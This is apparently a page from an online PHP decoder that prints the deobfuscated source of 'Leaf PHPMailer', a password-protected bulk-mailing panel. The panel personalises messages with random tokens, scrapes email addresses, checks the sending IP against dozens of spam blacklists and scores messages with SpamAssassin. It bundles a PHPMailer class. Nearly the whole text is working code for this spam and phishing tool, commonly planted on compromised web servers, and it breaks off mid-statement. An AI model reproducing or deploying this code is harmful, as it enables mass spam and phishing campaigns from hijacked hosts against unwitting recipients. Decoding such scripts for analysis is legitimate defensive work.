Online PHP and Javascript Decoder decode hidden script to uncover its real functionality


goto qLY2g; uLtx9: $maillist = explode("\xd
", $emailList); goto QQP7T; f5ucV: function randString($consonants) { goto erEQN; AERTJ: $i = 0; goto UKHJw; mjnEY: $password = ''; goto AERTJ; pElCi: $password .= $consonants[rand() % strlen($consonants)]; goto e422B; e422B: KI1Gn: goto OmI1Q; g3DGo: return $password; goto CP8CG; OmI1Q: $i++; goto HXaeW; UKHJw: kS3Bz: goto YCnJs; YCnJs: if (!($i < $length)) { goto CxFXk; } goto pElCi; erEQN: $length = rand(12, 25); goto mjnEY; HXaeW: goto kS3Bz; goto PM16z; PM16z: CxFXk: goto g3DGo; CP8CG: } goto FKyZI; rVC54: curl_setopt($ch, CURLOPT_TIMEOUT, 15); goto Ovvti; pFq0a: $bit7 = "selected"; goto ujpX8; rWdKK: session_start(); goto be5yN; v0vOa: print "<div class="text-" . $class . "">Your SpamAssassin score is " . $score . "  </div>\xd\xa<div>Full Report : <pre>" . $response->report . "</pre></div>"; goto QEBaO; RJzP5: $dnsbl_lookup = ["all.s5h.net", "b.barracudacentral.org", "bl.spamcop.net", "blacklist.woody.ch", "bogons.cymru.com", "cbl.abuseat.org", "cdl.anti-spam.org.cn", "combined.abuse.ch", "db.wpbl.info", "dnsbl-1.uceprotect.net", "dnsblj.uceprotect.net", "dnsbl-3.uceprotect.net", "dnsbl.anticaptcha.net", "dnsbl.dronebl.org", "dnsbl.inps.de", "dnsbl.sorbs.net", "drone.abuse.ch", "duinv.aupads.org", "dul.dnsbl.sorbs.net", "dyna.spamrats.com", "dynip.rothen.com", "http.dnsbl.sorbs.net", "ips.backscatterer.org", "ix.dnsbl.manitu.net", "korea.services.net", "misc.dnsbl.sorbs.net", "noptr.spamrats.com", "orvedb.aupads.org", "pbl.spamhaus.org", "proxy.bl.gweep.ca", "psbl.surriel.com", "relays.bl.gweep.ca", "relays.nether.net", "sbl.spamhaus.org", "short.rbl.jp", "singular.ttk.pte.hu", "smtp.dnsbl.sorbs.net", "socks.dnsbl.sorbs.net", "spam.abuse.ch", "spam.dnsbl.anonmails.de", "spam.dnsbl.sorbs.net", "spam.spamrats.com", "spambot.bls.digibase.ca", "spamrbl.imp.ch", "spamsources.fabel.dk", "ubl.lashback.com", "ubl.unsubscore.com", "virus.rbl.jp", "web.dnsbl.sorbs.net", "wormrbl.imp.ch", "xbl.spamhaus.org", "z.mailspike.net", "zen.spamhaus.org", "zombie.dnsbl.sorbs.net"]; goto EoX8N; og1we: if (!isset($_GET["emailfilter"])) { goto EAVUy; } goto moRaM; xMvBM: exit; goto Bd79Z; s71YX: $senderName = leafTrim($_POST["senderName"]); goto BFS40; Tzq_l: Sp9Zk: goto xc_kz; fsH2H: if (!isset($_GET["host"])) { goto BlWEa; } goto hnUE_; Dp3ba: leafheader(); goto QHODt; Bh51o: $sessioncode = md5(__FILE__); goto cKh9d; q_5TV: oHp8D: goto vXo6d; U8qTO: foreach ($_GET["host"] as $host) { goto Ya3vv; z7Xhg: kdS3K: goto nW51i; S6mSN: print "document.getElementById("" . $host . "").innerHTML = "" . $check . "";"; goto m_wBN; cqy9J: goto GbFHx; goto z7Xhg; nW51i: $check = "<font color='red'> Listed</font>"; goto vOyeG; Ya3vv: if (checkdnsrr($_GET["check_ip"] .  . $host . , "A")) { goto kdS3K; } goto okd6t; m_wBN: t6xJM: goto dAdWh; vOyeG: GbFHx: goto S6mSN; okd6t: $check = "<font color='green'> Clean</font>"; goto cqy9J; dAdWh: } goto xmuJS; V7WV8: $emailList = leafTrim($_POST["emailList"]); goto fdewk; vVTuW: Qfmqi: goto jcyyY; SCK3j: $mail->Encoding = $encoding; goto s9Dtq; nn8_s: if ($messageType == 1) { goto grdYg; } goto uMKv6; FscRR: $dnsT = count($dnsbl_lookup); goto c989j; QEBaO: print "    </div>"; goto F19f5; bySzo: goto jvmRV; goto Bwab4; mYdji: if ($encoding == "quoted-printable") { goto xC5Rv; } goto H2ax9; jQqDJ: if (leafMailCheck($senderEmail)) { goto Qd1Lo; } goto dvN3F; xiFxk: goto hmxlJ; goto B4f5V; rLbMU: $leaf["website"] = "leafmailer.pw"; goto Bh51o; TLRWs: $subject = leafTrim($_POST["subject"]); goto V7WV8; pwofb: goto Y_eoN; goto BJ6Pm; zJWvL: goto SFwff; goto dsYsW; QIF8V: if (!($j < $i + 10)) { goto Qfmqi; } goto Oo7pU; UVjYI: $host = ''; goto XqSHj; HjhDf: print "<pre align=center><form method=post>Password: <input type='password' name='pass'><input type='submit' value='>>'></form></pre>"; goto YPaur; A4fe_: $html = "checked"; goto pAm5w; pl788: $_POST["emailList"] = strtolower($_POST["emailList"]); goto UIvJ3; G2297: $hosts .= "{$host},"; goto xOWTQ; k8TYY: function leafClear($text, $email) { goto xPMhd; t4Ue5: $emaildomain = $e[1]; goto bzNCg; kH2ft: $text = str_replace("[-emaildomain-]", $emaildomain, $text); goto xpBoK; xpBoK: $text = str_replace("[-randomletters-]", randString("abcdefghijklmnopqrstuvwxyz"), $text); goto NVh7y; aFUUc: $emailuser = $e[0]; goto t4Ue5; NMWQH: $text = str_replace("[-email-]", $email, $text); goto jJWMf; E7vqZ: $text = str_replace("[-randommd5-]", md5(randString("abcdefghijklmnopqrstuvwxyz23456789")), $text); goto D2oGS; NVh7y: $text = str_replace("[-randomstring-]", randString("abcdefghijklmnopqrstuvwxyz034789"), $text); goto gVcpm; xPMhd: $e = explode("@", $email); goto aFUUc; D2oGS: return $text; goto aUGzq; bzNCg: $text = str_replace("[-time-]", date("m/d/Y h:i:s a", time()), $text); goto NMWQH; jJWMf: $text = str_replace("[-emailuser-]", $emailuser, $text); goto kH2ft; gVcpm: $text = str_replace("[-randomnumber-]", randString("234789"), $text); goto E7vqZ; aUGzq: } goto o6FIV; wtKht: $response = json_decode($response); goto UThTG; xO4Px: aoweR: goto vDeyK; ujpX8: goto hmxlJ; goto Z3DVv; GuIVf: print "<table >"; goto l3R6Y; M0Fe5: goto SFwff; goto i_547; pt6Wb: foreach ($matches[0] as $email) { print $email . "
"; UEyIk: } goto xO4Px; ybDcY: if (empty($host)) { goto Gz3Up; } goto h9Qb6; ECZ1H: $utf8 = ''; goto BAoqM; Jh567: $messageLetter = leafTrim($_POST["messageLetter"]); goto AjUd_; QBHxH: print "<body>"; goto WN6ef; CGP2i: dereg: goto pl788; bf9zB: UN8zA: goto xaXNT; GdwHf: if (!($response->success == TRUE)) { goto oAI1K; } goto cwMwJ; QHODt: print "<div class="container col-lgl"><h3><font color="green"><span class="glyphicon glyphicon-leaf"></span></font> Leaf PHPMailer <small>Email Filter</small></h3>"; goto j6k0h; SRTcV: $senderEmail = leafTrim($_POST["senderEmail"]); goto s71YX; xaXNT: HIvEE: goto XFFCm; dIZaj: ini_set("memory_limit", -1); goto YwsVy; rw3B2: EwI8a: goto m7k7c; AjUd_: $encoding = $_POST["encode"]; goto fvPnO; vOZK4: CWLO_: goto vUAns; Bwab4: JWoq5: goto U5Vx4; NADpb: Km6fO: goto voxQh; kJXcV: F3fZG: goto EIpdU; cKh9d: if (!(!empty($password) and $_SESSION[$sessioncode] != $password)) { goto ayNuQ; } goto uL67C; dsYsW: k2nN0: goto W0ZoC; HmaIi: preg_match_all($pattern, $_POST["emailList"], $matches); goto pt6Wb; oN0QI: print "Checking <b>" . $_GET["check_ip"] . "</b> in <b>{$dnsT}</b>  anti-spam databases:<br>"; goto bGmcW; iBpdo: if ($encoding == "binary") { goto N8_6Q; } goto qf1yN; HdU7k: q1cOt: goto xzyKv; xmuJS: YcoHj: goto U0VaA; ebo95: if ($_POST["submit"] == "extract") { goto T0YE3; } goto D2B3T; BkcOE: hmxlJ: goto q_5TV; t3HmQ: goto Dav8F; goto vOZK4; jRE9E: leafheader(); goto QBHxH; jf8d2: $binary = "selected"; goto nZynw; L9umd: HMPtH: goto Qkw6f; xc_kz: class PHPMailer { public $Version = "5.2.28"; public $Priority = null; public $CharSet = "iso-89-1"; public $ContentType = "text/plain"; public $Encoding = "8bit"; public $ErrorInfo = ''; public $From = "root@localhost"; public $FromName = "Root User"; public $Sender = ''; public $ReturnPath = ''; public $Subject = ''; public $Body = ''; public $AltBody = ''; public $Ical = ''; protected $MIMEBody = ''; protected $MIMEHeader = ''; protected $mailHeader = ''; public $WordWrap = 0; public $Mailer = "mail"; public $Sendmail = "/usr/sbin/sendmail"; public $UseSendmailOptions = true; public $PluginDir = ''; public $ConfirmReadingTo = ''; public $Hostname = ''; public $MessageID = ''; public $MessageDate = ''; public $Host = "localhost"; public $Port = 25; public $Helo = ''; public $SMTPSecure = ''; public $SMTPAutoTLS = true; public $SMTPAuth = false; public $SMTPOptions = array(); public $Username = ''; public $Password = ''; public $AuthType = ''; public $Realm = ''; public $Workstation = ''; public $Timeout = 300; public $SMTPDebug = 0; public $Debugoutput = "echo"; public $SMTPKeepAlive = false; public $SingleTo = false; public $SingleToArray = array(); public $do_verp = false; public $AllowEmpty = false; public $LE = "
"; public $DKIM_selector = ''; public $DKIM_identity = ''; public $DKIM_passphrase = ''; public $DKIM_domain = ''; public $DKIM_private = ''; public $DKIM_private_string = ''; public $action_function = ''; public $XMailer = " "; public static $validator = "auto"; protected $smtp = null; protected $to = array(); protected $cc = array(); protected $bcc = array(); protected $ReplyTo = array(); protected $all_recipients = array(); protected $RecipientsQueue = array(); protected $ReplyToQueue = array(); protected $attachment = array(); protected $CustomHeader = array(); protected $lastMessageID = ''; protected $message_type = ''; protected $boundary = array(); protected $language = array(); protected $error_count = 0; protected $sign_cert_file = ''; protected $sign_key_file = ''; protected $sign_extracerts_file = ''; protected $sign_key_pass = ''; protected $exceptions = false; protected $uniqueid = ''; const STOP_MESSAGE = 0; const STOP_CONTINUE = 1; const STOP_CRITICAL = 2; const CRLF = "\xd\xa"; const MAX_LINE_LENGTH = 998; public function __construct($exceptions = null) { goto UnlLt; t61Ln: $this->Debugoutput = strpos(PHP_SAPI, "cli") !== false ? "echo" : "html"; goto k77e2; UnlLt: if (!($exceptions !== null)) { goto S0_jc; } goto DjDB1; Yx6IE: S0_jc: goto t61Ln; DjDB1: $this->exceptions = (bool) $exceptions; goto Yx6IE; k77e2: } public function __destruct() { $this->smtpClose(); } private function mailPassthru($to, $subject, $body, $header, $params) { goto GsYvF; UWF1V: goto KVWgP; goto OtAxa; JR3ie: $subject = $this->secureHeader($subject); goto qxy6S; ikL0z: $result = @mail($to, $subject, $body, $header, $params); goto UWF1V; OtAxa: dEtDl: goto gopTy; tn4Fp: return $result; goto DmHOx; gopTy: $result = @mail($to, $subject, $body, $header); goto m8JpW; m9JHt: goto ChDE3; goto UkJCY; UkJCY: HQLE2: goto JR3ie; m8JpW: KVWgP: goto tn4Fp; GsYvF: if (ini_get("mbstring.func_overload") & 1) { goto HQLE2; } goto tDaPa; zkNN5: if (ini_get("safe_mode") or !$this->UseSendmailOptions or is_null($params)) { goto dEtDl; } goto ikL0z; qxy6S: ChDE3: goto zkNN5; tDaPa: $subject = $this->encodeHeader($this->secureHeader($subject)); goto m9JHt; DmHOx: } protected function edebug($str) { goto wzBWO; wzBWO: if (!($this->SMTPDebug <= 0)) { goto SgDvn; } goto ZD6Dr; mLPn7: SgDvn: goto dm5_O; dm5_O: if (!(!in_array($this->Debugoutput, array("error_log", "html", "echo")) and is_callable($this->Debugoutput))) { goto a06eU; } goto UMIde; UMIde: call_user_func($this->Debugoutput, $str, $this->SMTPDebug); goto IxdXv; Tv_u4: a06eU: goto fByFv; yYipv: wt9rR: goto DIg3Z; fByFv: switch ($this->Debugoutput) { case "error_log": error_log($str); goto ZRBMN; case "html": echo htmlentities(preg_replace("/[\r\n]+/", '', $str), ENT_QUOTES, "UTF-8") . "<br>\xa"; goto ZRBMN; case "echo": default: $str = preg_replace("/\r\n?/ms", "
", $str); echo gmdate("Y-m-d H:i:s") . "\x9" . str_replace("
", "\xa                   \x9                  ", trim($str)) . "
"; } goto yYipv; IxdXv: return; goto Tv_u4; ZD6Dr: return; goto mLPn7; DIg3Z: ZRBMN: goto ytPcn; ytPcn: } public function isSMTP() { $this->Mailer = "smtp"; } public function isMail() { $this->Mailer = "mail"; } public function isSendmail() { goto UGQBH; d6rrm: NSWzt: goto Ukx86; Ukx86: $this->Sendmail = "/usr/sbin/sendmail"; goto frKL3; Mwmg1: $this->Sendmail = $ini_sendmail_path; goto EfQSB; frKL3: VCEk6: goto RckLi; UGQBH: $ini_sendmail_path = ini_get("sendmail_path"); goto KUwpF; KUwpF: if (!stristr($ini_sendmail_path, "sendmail")) { goto NSWzt; } goto Mwmg1; RckLi: $this->Mailer = "sendmail"; goto Nr108; EfQSB: goto VCEk6; goto d6rrm; Nr108: } public function isQmail() { goto GMET_; PiupZ: goto AtvIe; goto bfNRi; l6iIR: $this->Sendmail = $ini_sendmail_path; goto PiupZ; xLBwF: $this->Sendmail = "/var/qmail/bin/qmail-inject"; goto EVpeF; t2PDG: $this->Mailer = "qmail"; goto HEkPo; bfNRi: AWFeD: goto xLBwF; EVpeF: AtvIe: goto t2PDG; gSAvq: if (!stristr($ini_sendmail_path, "qmail")) { goto AWFeD; } goto l6iIR; GMET_: $ini_sendmail_path = ini_get("sendmail_path"); goto gSAvq; HEkPo: } public function addAddress($address, $name = '') { return $this->addOrEnqueueAnAddress("to", $address, $name); } public function addCC($address, $name = '') { return $this->addOrEnqueueAnAddress("cc", $address, $name); } public function addBCC($address, $name = '') { return $this->addOrEnqueueAnAddress("bcc", $address, $name); } public function addReplyTo($address, $name = '') { return $this->addOrEnqueueAnAddress("Reply-To", $address, $name); } protected function addOrEnqueueAnAddress($kind, $address, $name) { goto F7aOD; wmfuT: qmV2c: goto zPiHX; UG8QN: $error_message = $this->lang("invalid_address") . " (addAnAddress {$kind}): {$address}"; goto yNMQN; jAI15: $this->edebug($error_message); goto mWOXE; HHe2g: lENHt: goto vGmbf; hr01X: $params = array($kind, $address, $name); goto bQ3MR; vGmbf: return false; goto Iyn0G; mWOXE: if (!$this->exceptions) { goto lENHt; } goto TPx0K; KSMmg: if (array_key_exists($address, $this->RecipientsQueue)) { goto qmV2c; } goto Up60d; sfeD9: if (!(($pos = strrpos($address, "@")) === false)) { goto hHjGW; } goto UG8QN; CGl_q: $this->ReplyToQueue[$address] = $params; goto b6RbK; zPiHX: cME8s: goto dsUS2; s9ntR: ZSre7: goto SSXTb; Mw5DE: if (array_key_exists($address, $this->ReplyToQueue)) { goto msAky; } goto CGl_q; dsUS2: return false; goto s9ntR; m2RC0: $name = trim(preg_replace("/[\r\n]+/", '', $name)); goto sfeD9; bQ3MR: if (!($this->has8bitChars(substr($address, ++$pos)) and $this->idnSupported())) { goto ZSre7; } goto vyJP0; F7aOD: $address = trim($address); goto m2RC0; JNwdC: msAky: goto Lseot; b6RbK: return true; goto JNwdC; TPx0K: throw new phpmailerException($error_message); goto HHe2g; Up60d: $this->RecipientsQueue[$address] = $params; goto guU5g; SSXTb: return call_user_func_array(array($this, "addAnAddress"), $params); goto T8U6j; guU5g: return true; goto wmfuT; XdpgJ: heD05: goto KSMmg; Iyn0G: hHjGW: goto hr01X; vyJP0: if ($kind != "Reply-To") { goto heD05; } goto Mw5DE; yNMQN: $this->setError($error_message); goto jAI15; Lseot: goto cME8s; goto XdpgJ; T8U6j: } protected function addAnAddress($kind, $address, $name = '') { goto tPjY3; Swpps: throw new phpmailerException($error_message); goto C832D; X6xhq: return false; goto zBmnY; cqm5W: HM5AR: goto GPRay; n7gNw: $error_message = $this->lang("invalid_address") . " (addAnAddress {$kind}): {$address}"; goto hsMMb; GPRay: return false; goto oS4O0; LPmBK: return true; goto Hdv0k; Pd3mB: if (!$this->exceptions) { goto HM5AR; } goto gHIZT; jRgNw: goto bJizK; goto hzusF; hsMMb: $this->setError($error_message); goto Zd25S; jMWyd: if (!$this->exceptions) { goto Q2MiP; } goto Swpps; NyaXW: bJizK: goto X6xhq; oy6Rs: $this->ReplyTo[strtolower($address)] = array($address, $name); goto LPmBK; Cw_h0: $this->setError($error_message); goto tq_QM; Hdv0k: FJblB: goto jRgNw; Mn9qa: return true; goto uzU4c; Zd25S: $this->edebug($error_message); goto Pd3mB; Dlm9k: if ($this->validateAddress($address)) { goto lK9Uw; } goto n7gNw; uzU4c: hVoWp: goto NyaXW; oS4O0: lK9Uw: goto HDWay; C832D: Q2MiP: goto Iqdwr; N56fE: $this->all_recipients[strtolower($address)] = true; goto Mn9qa; gHIZT: throw new phpmailerException($error_message); goto cqm5W; zQTRz: array_push($this->{$kind}, array($address, $name)); goto N56fE; hkPcy: if (array_key_exists(strtolower($address), $this->ReplyTo)) { goto FJblB; } goto oy6Rs; Iqdwr: return false; goto GEltQ; tq_QM: $this->edebug($error_message); goto jMWyd; PxDJP: if (array_key_exists(strtolower($address), $this->all_recipients)) { goto hVoWp; } goto zQTRz; GEltQ: PksLs: goto Dlm9k; hzusF: azLJW: goto PxDJP; Vs5c8: $error_message = $this->lang("Invalid recipient kind: ")


© 2023 Quttera Ltd. All rights reserved.